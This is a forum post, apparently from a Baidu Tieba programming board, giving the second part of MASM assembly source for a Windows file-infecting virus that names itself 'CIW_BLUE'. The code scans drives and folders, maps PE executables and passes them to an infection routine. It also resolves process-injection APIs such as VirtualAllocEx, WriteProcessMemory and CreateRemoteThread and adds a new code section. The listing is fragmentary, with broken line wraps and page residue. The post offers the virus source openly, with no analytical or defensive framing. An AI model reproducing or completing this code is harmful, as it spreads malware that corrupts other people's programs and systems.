代码第二部分【编程吧】

;****************** 是文件 ***************************
;invoke MessageBox, NULL, addr
@szFindFile, NULL, MB_OK
invoke CreateFile, addr @szFindFile,
GENERIC_READ or GENERIC_WRITE,\
FILE_SHARE_READ or FILE_SHARE_WRITE,
NULL, OPEN_EXISTING ,NULL , NULL
mov hFile, eax
invoke CreateFileMapping, hFile, NULL,
PAGE_READWRITE , 0, 0, NULL
invoke MapViewOfFile, eax,
FILE_MAP_WRITE or FILE_MAP_READ, 0, 0, 0
.if !eax
jmp _ExitOpen
.endif
mov lpMemory, eax
mov esi, eax
assume esi: ptr IMAGE_DOS_HEADER
add esi, [esi].e_lfanew
invoke _Infect, lpMemory, esi
invoke CloseHandle, hFile
;******************************************************
.endif
_ExitOpen:
invoke FindNextFile,@hFindFile,addr @stFindFile
.until eax == FALSE
invoke FindClose,@hFindFile
.endif
popad
ret
_FindFile
endp
start:
;*********************** 获取全部磁盘 *************************
invoke _FindFile, offset szFindFileName
invoke GetLogicalDriveStrings, 26 * 4, offset szBuffer1
lea esi, szBuffer1
mov edi, 26
.repeat
invoke GetDriveType, esi
.if eax == DRIVE_FIXED ;硬盘
.endif
add esi, 4
dec edi
.until !byte ptr [esi]
_Exit:
invoke ExitProcess, 0
end start
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include AddFunDef.inc
_VirusThread proto :dword
_Align proto :dword,:dword
_FindFile1 proto :dword
_InfectFile proto :dword
APPEND_CODE equ this byte
include GetKernel1.asm
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
hDllKernel32 dd ?
hDllUser32 dd ?
_GetProcAddress _ApiGetProcAddress ?
_LoadLibrary _ApiLoadLibrary ?
szLoadLibrary db 'LoadLibraryA',0
szGetProcAddress db 'GetProcAddress',0
;********************* Kernel32函数定义 *****************************
_ExitProcess _ApiExitProcess ?
_VirtualAllocEx _ApiVirtualAllocEx ?
_CreateRemoteThread _ApiCreateRemoteThread
?
_CreateThread _ApiCreateThread ?
_OpenProcess _ApiOpenProcess ?
I

_WriteProcessMemory _ApiWriteProcessMemory
?
_CreateFile _ApiCreateFile ?
_CreateFileMapping _ApiCreateFileMapping
?
_MapViewOfFile _ApiMapViewOfFile ?
_GlobalAlloc _ApiGlobalAlloc ?
_GlobalFree _ApiGlobalFree ?
_CloseHandle _ApiCloseHandle ?
_WriteFile _ApiWriteFile ?
_SetEndOfFile _ApiSetEndOfFile ?
_lstrcmp _Apilstrcmp ?
_lstrcat _Apilstrcat ?
_lstrcpy _Apilstrcpy ?
_Process32First _ApiProcess32First ?
_Process32Next _ApiProcess32Next ?
_Create32Snapshot _ApiCreate32Snapshot
?
_ReadProcessMemory _ApiReadProcessMemory
?
_GetCurrentProcessId dd ?
_GetDriveStrings _ApiGetDriveStrings ?
_GetDriveType _ApiGetDriveType ?
_FindFirstFile _ApiFindFirstFile ?
_FindNextFile _ApiFindNextFile ?
_SetFilePointer _ApiSetFilePointer ?
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;***********************
Kernel32函数名称定义
****************************
szExitProcess db 'ExitProcess',0
szVirtualAllocEx db 'VirtualAllocEx',0
szCreateRemoteThread db 'CreateRemoteThread',0
szCreateThread db 'CreateThread',0
szOpenProcess db 'OpenProcess',0
szWriteProcessMemory db 'WriteProcessMemory',0
szCreateFile db 'CreateFileA',0
szCreateFileMapping db 'CreateFileMappingA',0
szMapViewOfFile db 'MapViewOfFile',0
szGlobalAlloc db 'GlobalAlloc',0
szGlobalFree db 'GlobalFree',0
szCloseHandle db 'CloseHandle',0
szWriteFile db 'WriteFile',0
szSetEndOfFile db 'SetEndOfFile',0
szlstrcmp db 'lstrcmp',0
szlstrcat db 'lstrcat',0
szlstrcpy db 'lstrcpy',0
szProcess32First db 'Process32First',0
szProcess32Next db 'Process32Next',0
szCreate32Snapshot db 'CreateToolhelp32Snapshot',0
szReadProcessMemory db 'Toolhelp32ReadProcessMemory',0
szGetCurrentProcessId db 'GetCurrentProcessId',0
szGetDriveStrings db 'GetLogicalDriveStringsA',0
szGetDriveType db 'GetDriveTypeA',0
szFindFirstFile db 'FindFirstFileA',0
szFindNextFile db 'FindNextFileA',0
szSetFilePointer db 'SetFilePointer',0,0 ;注意最后的结尾
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;**********************
User32函数名称定义
********************************
I

_MessageBox _ApiMessageBox ?
_GetWindowProcessId _ApiGetWindowProcessId
?
_FindWindow _ApiFindWindow ?
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;**********************
User32函数名称定义
********************************
szMessageBox db 'MessageBoxA',0
szGetWindowProcessId db 'GetWindowThreadProcessId',0
szFindWindow db 'FindWindowA',0,0;注意最后的结尾
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;**********************
一些常量字符串定义
*********************************
szUser32 db 'User32',0
szSectionName1 db '.CIW',0
szSeciotnName2 db 'CCCC',0
szInfectName db 'C:\感染区',0
szMsgCaption1 db '病毒启动',0
szMsgText1 db 'CIW_BLUE 病毒.',0
szBuffer db 4*26+1 dup (0)
szFilter db '*.*',0
szTemp3 db '\',0
szNotInfect db 'NTDETECT.COM',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;**********************
一些句柄定义 ****************************************
hInfectFile dd ?
hFileMap dd ?
lpOldFileMemory dd ?
lpNewFileMemory dd ?
dwInfectRAW dd ?
dwInfctRAV dd ?
dwInfectCodeSize dd ?
dwTemp dd ?
dwSecNum dd ?
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 新的入口地址
_NewEntry:

日	一	二	三	四	五	六

代码第二部分

扫二维码下载贴吧客户端